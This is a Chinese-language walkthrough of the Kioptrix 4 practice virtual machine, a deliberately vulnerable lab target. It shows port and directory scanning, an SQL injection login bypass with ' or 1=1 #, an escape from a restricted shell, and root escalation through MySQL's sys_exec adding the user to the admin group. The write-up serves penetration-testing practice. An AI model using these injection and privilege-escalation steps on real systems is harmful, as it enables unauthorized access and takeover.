环境准备
靶机链接:百度网盘 请输入提取码
提取码:hjpd
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
下载后操作:将靶机3的kioptrix3.vmx复制到4里,然后打开kioptrix3.vmx文件,把kioptrix3全部替换成kioptrix4_vmware保存即可!
信息收集
1.通过nmap探测目标靶机开放端口和服务情况
nmap -p- -A -T4 192.168.1.101
2.gobuster扫描网站目录
gobuster dir -u http://192.168.1.101 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 \ -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
漏洞利用
1.访问网页,是登录界面尝试sql注入
2.用户名密码都输入' 出现下面页面 说明有SQL注入漏洞
3.输入 'or 1=1# 报账户问题,那就找用户名来试试
4.把用户输入john 密码为' or 1=1 # 成功登录,得到密码MyNameIsJohn
权限提升
1.登录ssh之后,发现无法执行命令
ssh john@192.168.1.101
2.echo $SHELL 查看当前系统默认的shell ,去谷歌查报错,发现是limited shell
forbidden path -> "/bin/kshell"
3.输入下面命令,
echo os.system('/bin/bash')
4.没有可利用信息
find / -perm -u=s -type f 2>/dev/null
5.ps -ef查看下进程,发现mysql是以root身份开启的,正常是以mysql开启的,应该是要调用系统命令的
6.去网站目录下查看,发现php文件有用户名密码。
7.mysql -uroot
8.利用sys_exec()把用户john分配到admin组里
select sys_exec('usermod -a -G admin john');
9.加入到admin组,就可以执行sudo sudo /bin/bash